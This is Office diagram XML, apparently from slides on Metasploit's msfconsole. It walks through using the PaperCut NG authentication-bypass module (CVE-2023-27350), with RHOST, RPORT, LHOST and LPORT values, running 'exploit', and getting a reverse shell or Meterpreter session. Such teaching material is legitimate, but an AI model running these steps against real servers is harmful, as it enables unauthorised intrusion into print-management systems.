    <dgm:cxn modelId="{224427CC-B6DB-1442-816F-97CCBE9706DA}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{1C430CB4-3EFC-644D-A8CF-24230DEC34DD}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{13B073F1-A8B1-1746-9D9E-7279019D52C5}" type="presParOf" srcId="{1C430CB4-3EFC-644D-A8CF-24230DEC34DD}" destId="{5AB31BF8-A3C4-B34E-B693-073231E5FF20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{E61037A9-4173-0A4C-8383-F62524E92053}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{0B55845F-BEF7-104F-8CD4-C229B0697BF5}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{3891FE00-7483-C540-9590-98EACA1E66E5}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{981AE960-44EB-A54E-BB4A-7242EC928243}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{42BFF087-F54D-734D-9F41-5BBB563E9EBC}" type="presParOf" srcId="{981AE960-44EB-A54E-BB4A-7242EC928243}" destId="{BD77F850-5F34-8540-82B9-10F36796C84B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{E3FAE95D-3DC8-5D48-9321-8984C18F30C7}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{C7434790-D7E9-8444-9B06-F89526A28B96}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{0A2958C1-2E9A-854E-A982-5CDFA0A876FC}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{A9D6A0F6-4889-6A45-990C-0E39F9A11B49}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{78781E9B-0BCB-CF46-A9E4-D45898643F09}" type="presParOf" srcId="{A9D6A0F6-4889-6A45-990C-0E39F9A11B49}" destId="{ADBD7891-7C19-D341-A912-E350D48E4444}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{75E0C606-EB2C-6849-8A0B-8FC1704AF7C0}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{E50D64C6-BBF9-964F-AEA3-CB268D4E18FD}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{B313F4E6-3201-3E4D-AED9-50DCE110FD70}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{475506ED-F649-FB4E-B8BA-B7600C18EBA6}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{75140D7D-7388-714B-98C9-D701DF8A8E26}" type="presParOf" srcId="{475506ED-F649-FB4E-B8BA-B7600C18EBA6}" destId="{EAB9BA14-560A-BE46-95D4-6F5B057160B5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/RepeatingBendingProcessNew"/>
    <dgm:cxn modelId="{EBCEF74B-04B1-5F4F-8D40-CA67EDD804C2}" type="presParOf" srcId="{AC3D2A1C-36F9-4F47-B966-45D8BD3BC508}" destId="{29683069-108C-424A-BD53-CD1E24E46F27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7B758C-B9DD-2F4B-A12D-AE58ADDFADB8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="561829"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>What is msfconsole?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="578623"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{77EF4160-D041-7347-AE67-3FC2F12623D7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="931784"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>msfconsole is the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>main command-line interface</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t> of the Metasploit Framework, a powerful penetration testing tool used by cybersecurity professionals and ethical hackers. It provides a flexible and powerful environment to search, configure, and execute exploits, payloads, auxiliary modules, and more.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="948578"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0398D707-2E6E-1D45-9FD4-45F405E586F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1301738"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>Key Features of msfconsole:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="1318532"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{448AD047-D235-0041-BDAA-CCFDBC3B08C6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1671693"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🔍 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Module Search</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Quickly find exploits, payloads, post-exploitation tools, and scanners using search.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="1688487"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1EDF4C54-D71F-F24C-AD2D-8983878CD817}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2041648"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🛠️ </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Module Configuration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Use use &lt;module&gt;, set &lt;option&gt;, and show options to configure attacks.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="2058442"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DDBF5CB2-8F5B-E540-820C-5280CF95BC71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2411603"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🧠 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Database Integration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Integrate with a PostgreSQL database to store data from scans and sessions.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="2428397"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2710EA5E-C778-574A-BCB9-34036A5F8213}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2781558"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🔄 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Session Management</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Interact with compromised systems using sessions command.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="2798352"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{05085D1D-68E8-4140-961D-8B4F4F098364}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3151513"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🧩 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Automation Support</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Scripts and resource files (.rc) can automate complex workflows.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="3168307"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A4DBDC3F-0C99-3D4A-9546-DB440B8DD493}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3521468"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>📊 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Info Gathering</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: Run auxiliary modules like scanners or fuzzers to gather information before exploitation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="3538262"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C4D77DF7-04FF-D24E-A2A6-7E28BEBEEACE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3891422"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>🔐 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>Post-Exploitation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t>: After gaining access, use post modules to gather more data or maintain access.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="3908216"/>
        <a:ext cx="8116498" cy="3104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6C3B22-071C-4062-AA37-0F35BB040322}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="357057"/>
          <a:ext cx="5728649" cy="131224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626F69-75E1-417B-8A94-3AEB2B76464E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="354324" y="581409"/>
          <a:ext cx="719878" cy="7086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3175B-7DA9-4E40-B363-21852094A784}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1207519" y="511"/>
          <a:ext cx="4556552" cy="1937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040" tIns="139040" rIns="139040" bIns="13904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CMD -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t>use exploit/multi/http/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>papercut_ng_auth_bypass</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1207519" y="511"/>
        <a:ext cx="4556552" cy="1937112"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E85886CE-50D5-4FE9-A3E7-3BEF18C7CBCD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2197657"/>
          <a:ext cx="5728649" cy="124707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FDCFD-4630-4FD0-9A2B-1E878209E586}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="354324" y="2524094"/>
          <a:ext cx="719878" cy="7086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0190EF-6363-470E-9ED2-DF4166F62C21}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1463949" y="2254873"/>
          <a:ext cx="4043690" cy="13137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040" tIns="139040" rIns="139040" bIns="13904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Metasploit Module: exploit/multi/http/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" b="1" kern="1200" dirty="0" err="1"/>
            <a:t>papercut_ng_auth_bypass</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1463949" y="2254873"/>
        <a:ext cx="4043690" cy="1313759"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{935AA0A1-5642-4D6A-8190-4379065F4ABE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-35422" y="3910133"/>
          <a:ext cx="5728649" cy="124707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8DB3D-6778-4801-838D-A6117CC9B5DE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="354324" y="4179355"/>
          <a:ext cx="719878" cy="7086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7626B-9FFB-4254-8208-06BBE0E0C782}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1147025" y="3886393"/>
          <a:ext cx="4295734" cy="1362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040" tIns="139040" rIns="139040" bIns="13904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The exploit/multi/http/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>papercut_ng_auth_bypass</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t> module targets a critical </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" b="1" kern="1200" dirty="0"/>
            <a:t>authentication bypass vulnerability</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t> in </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>PaperCut</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t> NG and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>PaperCut</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t> MF print management software. This vulnerability is tracked as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" b="1" kern="1200" dirty="0"/>
            <a:t>CVE-2023-27350</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" kern="1200" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1147025" y="3886393"/>
        <a:ext cx="4295734" cy="13622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36D67D-4125-4F62-B6EE-74C5C42DECA3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="566632" y="789947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6F5BD5-D363-4AF0-887B-700C3502AE13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="800632" y="1023948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9844BA-E611-463C-955E-E0748B6AA742}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="215632" y="222994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set RHOST 192.168.3.101 – Vitim IP</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="215632" y="2229948"/>
        <a:ext cx="1800000" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D70CC773-3A24-4456-87C7-2483D8CBEC72}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2681632" y="789947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C9E2E4-EC0D-4C5B-B9C5-3E82D936880E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2915632" y="1023948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F3AA57-7EF2-4E03-9BD4-638972A688A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2330632" y="222994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set RPORT 9191 – Vitim Port of which the server is running in port number &lt;&gt;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2330632" y="2229948"/>
        <a:ext cx="1800000" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AB2D06B2-0039-4947-9D36-B19D4631C727}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4796632" y="789947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1CDFA-5F7B-41E5-91BA-B1AC02899F95}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5030632" y="1023948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F1CA43-BC50-4411-831C-5BCA646AC6ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4445632" y="222994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set LHOST 192.168.3.100 – Attacker IP</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4445632" y="2229948"/>
        <a:ext cx="1800000" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{21E4A121-A6C2-48F1-AB56-0B8FEB0FB4EE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6911632" y="789947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9D7A5-2EAC-4583-8425-D181661BCF91}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7145632" y="1023948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09CA6F-5CB8-4FE4-8DF5-A1BF8F25CD00}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6560632" y="222994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set LPORT 4444 – Attacker Port to reverse connect </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6560632" y="2229948"/>
        <a:ext cx="1800000" cy="720000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AD04BF8E-EE0E-41FD-8F8D-269A39E956D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9026632" y="789947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3ACDCB-32A3-4755-BE43-F47FA7FBF7F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9260632" y="1023948"/>
          <a:ext cx="630000" cy="630000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7513CF-937E-41BB-BCA3-1CFC5A1FEDEA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8675632" y="222994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set VERBOSE true – For detailed output of attack </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8675632" y="2229948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88CBA7-A0C7-B94E-A860-0F32666094B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="90487"/>
          <a:ext cx="1875472" cy="112528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/>
            <a:t>CMD - exploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="90487"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC621C7B-5E88-114F-9A92-F65FE84328D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2063019" y="90487"/>
          <a:ext cx="1875472" cy="112528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/>
            <a:t>What Happens During This Step?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2063019" y="90487"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D04B0008-F16F-6D43-8050-7B977F68C01F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4126039" y="90487"/>
          <a:ext cx="1875472" cy="112528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The exploit module sends the crafted request to the target.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4126039" y="90487"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BA620F55-7CE3-CF4A-B8C5-EE7828F8F310}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1403318"/>
          <a:ext cx="1875472" cy="112528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If the vulnerability is present and everything is set correctly:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1403318"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4B9F060E-611E-0546-B1FA-BB1720B9A068}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2063019" y="1403318"/>
          <a:ext cx="1875472" cy="112528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The payload gets executed on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2063019" y="1403318"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0EF72A2F-DA68-E74E-B9A3-45276E04E97B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4126039" y="1403318"/>
          <a:ext cx="1875472" cy="112528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The target connects back to the attacker’s system (reverse shell or Meterpreter session).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4126039" y="1403318"/>
        <a:ext cx="1875472" cy="1125283"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2F3FE2FC-1A5B-FB48-B1F3-C7F80E438577}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2063019" y="2716148"/>
          <a:ext cx="1875472" cy="112528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A new session is opened if successful.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2063019" y="2716148"/>
        <a:ext cx="1875472" cy="11252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7B758C-B9DD-2F4B-A12D-AE58ADDFADB8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="561829"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>What is msfconsole?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="578623"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{77EF4160-D041-7347-AE67-3FC2F12623D7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="931784"/>
          <a:ext cx="8150086" cy="3440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/>
            <a:t>msfconsole is the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" b="1" kern="1200"/>
            <a:t>main command-line interface</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="900" kern="1200"/>
            <a:t> of the Metasploit Framework, a powerful penetration testing tool used by cybersecurity professionals and ethical hackers. It provides a flexible and powerful environment to search, configure, and execute exploits, payloads, auxiliary modules, and more.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="16794" y="948578"/>
        <a:ext cx="8116498" cy="310446"/>
      </dsp:txXfrm>
    </dsp:sp>
